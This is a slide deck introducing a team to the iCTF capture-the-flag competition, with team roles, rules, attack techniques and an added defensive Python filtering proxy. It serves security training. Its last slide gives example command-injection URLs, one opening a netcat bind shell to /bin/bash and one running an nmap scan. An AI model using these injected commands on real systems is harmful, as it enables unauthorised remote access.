CAPTURE THE FLAG Introductions beer brew man dutchrowboat


Page 1: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

CAPTURE THE FLAG

Introductions

beer brew man

dutchrowboat

Page 2

Page 3

Teams

• Firewall
• IDS/IPS
• Services – Attack and Defense: PHP, Perl, Ruby, Python, Java
• Analysis: Wireshark, etc., C/ASM
• Operating System: Apache, OS Configuration, etc.

Page 4

iCTF

• Came from Defcon
• iCTF run by UCSB
• No test required – just .edu
• “Largest existing live security exercise”
• Tests skills of understanding security

Page 5

What is it?

A variety of Internet-enabled services. Services comprised of:

• PHP
• Perl
• Shell scripts
• C++
• MySQL
• Apache/lighttpd
• SSH
• XML-RPC
• FTP

Page 6

What to do

• All services should be protected: patch, IPS/IDS
• All services should be attacked

Page 7

Page 8

Blender

SNAT with weights?

Is it real?

Page 9

Rules

• No DoS – all traffic is penalized
• Must stay on the internal network
• Don't prevent legitimate traffic
• Don't break rules: if attacking a service, don't launch a DoS from the compromised machine
• 2005 Defcon – hack the scorebot

Page 10

Attack Techniques

• Buffer overflows
• Format string attacks
• Shell attacks
• Race conditions
• Misconfigurations
• Authentication attacks
• Web-based attacks
  Directory traversal
  Cookie-based services
  Cross-site scripting
  Server-side applications
• Lack of parameter validation (e.g., SQL injection)

Page 11

Skills

• Scanning
• Firewalling
• Intrusion Detection
• Vulnerability analysis
• For each type of vulnerability:
  How to identify a vulnerability
  How to exploit a vulnerability
  How to patch a vulnerability (without disrupting the get/set flag methods)
  How to detect a vulnerability
• For each service:
  How to monitor the requests to a service
  How to monitor the execution of a request
  Protocol security analysis
  Application security analysis

Page 12

Vigna's Suggestions

• Have a structured team with clear responsibilities:
  The Perl/Python/PHP group
  The SQL/database group
  The flaw-finder group
  The firewall group
  The IDS group
  The C-based exploit group
• Have a leader responsible for coordination and integration
• Have a way to intercept socket connections and apply regexes/substitutions
• Have vulnerability analysis tools handy
• Have a “human IDS”
• Remember: the game lasts only a few hours
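As an added example (not from the slides or from iCTF itself), a minimal filtering TCP proxy in Python that intercepts connections to a service and applies regex rules to each request before forwarding it: traversal and tautology SQL-injection patterns from the Attack Techniques slide are dropped and logged, while script tags are rewritten rather than dropped so the scorebot's flag get/set traffic keeps flowing. The backend address, listening port and rule set are assumptions.

```python
import re
import socket
import socketserver
import sys

# Constructed rules for this example (pattern, replacement). A replacement of
# None means "drop the whole request and log it"; otherwise the match is
# rewritten and the request still reaches the service.
RULES = [
    # directory traversal in a path or parameter
    (re.compile(rb"\.\.[/\\]"), None),
    # tautology-style SQL injection such as ' OR '1'='1
    (re.compile(rb"(?i)'\s*or\s+'[^']*'\s*=\s*'"), None),
    # defang inline script tags rather than dropping: the scorebot's flag
    # get/set requests to a web service must keep flowing
    (re.compile(rb"(?i)<\s*/?\s*script"), b"&lt;script"),
]

BACKEND = ("127.0.0.1", 8080)   # assumed: the real service moved to localhost
LISTEN = ("0.0.0.0", 80)        # assumed: the port the scorebot expects


def filter_request(data: bytes):
    """Apply RULES in order; return the rewritten request, or None to drop it."""
    for pattern, replacement in RULES:
        if replacement is None:
            if pattern.search(data):
                return None
        else:
            data = pattern.sub(replacement, data)
    return data


class FilteringProxy(socketserver.StreamRequestHandler):
    def handle(self):
        # simplification: one recv() is assumed to hold the whole request
        request = self.request.recv(65536)
        filtered = filter_request(request)
        if filtered is None:
            print(f"[blocked] {self.client_address[0]} {request[:80]!r}", file=sys.stderr)
            return
        with socket.create_connection(BACKEND) as upstream:
            upstream.sendall(filtered)
            upstream.shutdown(socket.SHUT_WR)
            while chunk := upstream.recv(65536):   # relay the reply unchanged
                self.request.sendall(chunk)


if __name__ == "__main__":
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(LISTEN, FilteringProxy) as srv:
        srv.serve_forever()
```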

Page 13

Not the first time…

Page 14

2009

Page 15

Page 16

Questions?

http://athena.uccs.edu/ictf

Page 17

Backups…

Page 18

Test Network / Real Network

[Network diagram. Labelled nodes: Image (10.10.1.2), Vuln (10.10.1.3), Team (10.10.1.4), Hub, Team Box (10.10.1.1), Mon Box (10.10.1.x), Attack Boxes, Console for Fixes, Image Test Box, Vuln Patch Test, Vuln Attack Box, UCCS Boxes]

Page 19

Some Examples

echo GET / | nc 10.110.134.123 80 > ./myoutput.txt

http://10.100.134.77/users/[email protected]?command=nc -lp 1337 -e /bin/bash

http://10.100.134.77/users/[email protected]?command=nmap -p 1-65535 10.120.134.222 > port.txt